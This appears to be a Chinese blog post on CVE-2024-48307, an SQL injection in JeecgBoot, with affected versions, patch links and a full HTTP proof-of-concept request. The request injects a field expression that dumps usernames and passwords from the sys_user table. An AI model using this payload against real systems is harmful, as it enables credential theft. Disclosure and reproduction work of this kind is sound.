_副本-incq.png)
JeecgBoot SQL注入漏洞CVE-2024-48307
漏洞介绍
JeecgBoot是中国国炬(Jeecg)公司的一个适用于企业 Web 应用程序的 Java 低代码平台。采用前后端分离架构:SpringBoot2.x,Ant Design&Vue,Mybatis-plus,Shiro,JWT。强大的代码生成器让前后端代码一键生成,无需写任何代码。
JeecgBoot v3.7.1版本存在安全漏洞,该漏洞源于通过组件 /onlDragDatasetHead/getTotalData 发现包含 SQL 注入漏洞。
影响版本
org.jeecgframework.boot:jeecg-boot-parent<3.7.1
漏洞复现
1.访问漏洞环境
2.对漏洞进行复现
POC
漏洞复现
POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1Host: 127.0.0.1User-Agent: curl/7.88.1Accept: */*Content-Type: application/jsonContent-Length: 284Connection: close
{"tableName":"sys_user","compName":"test","condition":{"filter":{}},"config":{"assistValue":[],"assistType":[],"name":[{"fieldName":"concat(username,0x3a,password)","fieldType":"string"},{"fieldName":"id","fieldType":"string"}],"value":[{"fieldName":"id","fieldType":"1"}],"type":[]}}
测试,通过响应判断漏洞存在。
3.nuclei文件测试
修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://www.jeecg.com/
Github:https://github.com/jeecgboot/JeecgBoot/issues/7237
免责声明
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本平台和发布者不为此承担任何责任。
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果